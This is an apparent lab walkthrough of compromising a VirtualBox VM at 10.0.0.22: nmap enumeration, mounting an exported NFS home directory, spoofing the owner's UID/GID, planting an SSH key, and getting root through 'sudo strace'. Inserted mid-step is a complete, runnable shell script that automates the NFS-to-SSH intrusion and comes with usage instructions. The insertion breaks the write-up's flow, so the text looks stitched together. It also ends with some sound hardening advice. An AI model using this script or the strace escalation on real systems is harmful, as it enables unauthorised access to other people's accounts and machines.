Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
| 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_ 256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42998/udp6 mountd
| 100005 1,2,3 51373/udp mountd
| 100005 1,2,3 54941/tcp mountd
| 100005 1,2,3 56091/tcp6 mountd
| 100021 1,3,4 39195/tcp6 nlockmgr
| 100021 1,3,4 41981/tcp nlockmgr
| 100021 1,3,4 46553/udp nlockmgr
| 100021 1,3,4 53353/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
33243/tcp open mountd 1-3 (RPC #100005)
37451/tcp open mountd 1-3 (RPC #100005)
41981/tcp open nlockmgr 1-4 (RPC #100021)
54941/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2-4.9
Uptime guess: 37.139 days (since Thu Aug 29 12:22:51 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 10.0.0.22
Here we found the NFS service open (nfs on 2049 with nfs_acl and mountd registered in rpcbind), so let's check which directories are exported.

Here we see that peter's home directory (/home/peter) is exported, and we can mount it with the mount command:
mount 10.0.0.22:/home/peter /tmp/peter
Note: create the /tmp/peter directory before running the mount command.
And here we have the peter directory mounted, but we cannot make changes in it: the files belong to a UID/GID that our local user does not have, and NFSv3 grants access based on the numeric UID/GID the client presents. So we created a user on our local system with the same UID and GID as the mounted peter directory:
useradd peter
passwd peter
vim /etc/passwd (edit peter's UID and GID to 1001:1005)
Then we switched to the peter user and could make changes in the share, since we now have the same UID and GID as the owner.
We didn't find anything in the share that would directly get us an SSH session, so we made our own "authorized_keys" file and followed the commands below.

We created a new .ssh directory in /tmp/peter, placed anything.pub in it and renamed it to authorized_keys.

Now we can SSH in as the peter user, because we put an authorized key in place: ssh-keygen gave us two files, anything (the private key) and anything.pub (the public key). We placed anything.pub in peter's .ssh directory as authorized_keys, and now we use the anything file to authenticate.

And now we are connected over SSH as peter.
Now let's look for privilege escalation. With sudo -l we see that peter may run /bin/strace as root via sudo, so we use strace to spawn a root shell (strace runs the traced program with sudo's root privileges, and -o /dev/null just discards the trace):
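The whole share-to-shell chain above, as an added example that is not part of the original write-up: it lists the exports, mounts the share, creates a local user carrying the share owner's UID/GID (with useradd -u/-g instead of hand-editing /etc/passwd), plants a key with the permissions sshd's StrictModes requires, and logs in. The target address, /home/peter and /tmp/peter are the write-up's values; the local account name nfs_peter, the key path and the script name nfs_key_drop.sh are assumptions made here.

```shell
#!/bin/sh
# Added example, not the original write-up's script: automates the NFS
# UID/GID-spoofing path described above. TARGET, the export and /tmp/peter
# come from the write-up; the local account name "nfs_peter" and the key
# path are assumptions made here.
set -eu

TARGET="${TARGET:-10.0.0.22}"
MNT="${MNT:-/tmp/peter}"
KEY="${KEY:-$HOME/peter_nfs_key}"        # private key; "$KEY.pub" goes into the share
LOCAL_USER="${LOCAL_USER:-nfs_peter}"   # throw-away local account carrying the share's uid/gid

# From a `showmount -e` listing on stdin, print the first export under /home.
home_export() {
    awk '$1 ~ /^\/home\// { print $1; exit }'
}

# Numeric owner of a path as uid:gid. On an NFSv3 (AUTH_SYS) mount these are
# the server's ids, and the server trusts whatever uid/gid the client presents.
owner_ids() {
    stat -c '%u:%g' "$1"
}

# Append a public key to $1/.ssh/authorized_keys with the permissions sshd's
# StrictModes expects (700 directory, 600 file). Run it as the spoofed uid so
# the files end up owned by the remote user.
install_key() {
    home="$1"; pub="$2"
    ( umask 077; mkdir -p "$home/.ssh"; cat "$pub" >> "$home/.ssh/authorized_keys" )
    chmod 700 "$home/.ssh"
    chmod 600 "$home/.ssh/authorized_keys"
}

# The whole chain: enumerate, mount, clone the owner's ids locally, plant a key, log in.
run_attack() {
    export_path=$(showmount -e "$TARGET" | home_export)
    [ -n "$export_path" ] || { echo "no /home export found on $TARGET" >&2; exit 1; }
    mkdir -p "$MNT"
    sudo mount -t nfs -o vers=3 "$TARGET:$export_path" "$MNT"
    ids=$(owner_ids "$MNT")
    uid=${ids%%:*}; gid=${ids##*:}
    echo "share owned by uid=$uid gid=$gid; creating local user $LOCAL_USER with those ids"
    # useradd -u/-g does what the write-up did by hand-editing /etc/passwd.
    sudo groupadd -g "$gid" "$LOCAL_USER" 2>/dev/null || true
    sudo useradd -u "$uid" -g "$gid" -M -s /bin/sh "$LOCAL_USER"
    [ -f "$KEY" ] || ssh-keygen -t ed25519 -N '' -f "$KEY"
    # Re-invoke this script as the spoofed user so install_key runs with the right ids.
    sudo -u "$LOCAL_USER" sh "$0" install_key "$MNT" "$KEY.pub"
    remote_user=$(basename "$export_path")
    ssh -i "$KEY" "$remote_user@$TARGET"
}

# Entry point: `sh nfs_key_drop.sh run` launches the attack. With no argument
# only the functions are defined, so the file can be sourced or tested safely.
case "${1:-}" in
    run)         run_attack ;;
    install_key) install_key "$2" "$3" ;;
esac
```

Run it as `sh nfs_key_drop.sh run` from a machine where you have local root. The trick works because NFSv3 with the default AUTH_SYS flavour simply believes the UID/GID the client sends; root_squash only remaps UID 0, so it does not prevent this. The defences are exporting with sec=krb5 (or at least all_squash with an anonuid/anongid that owns nothing interesting) and restricting exports to specific client hosts rather than *.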
sudo strace -o /dev/null /bin/sh

And we have a root shell.
……………………………………COWABUNGA………………………………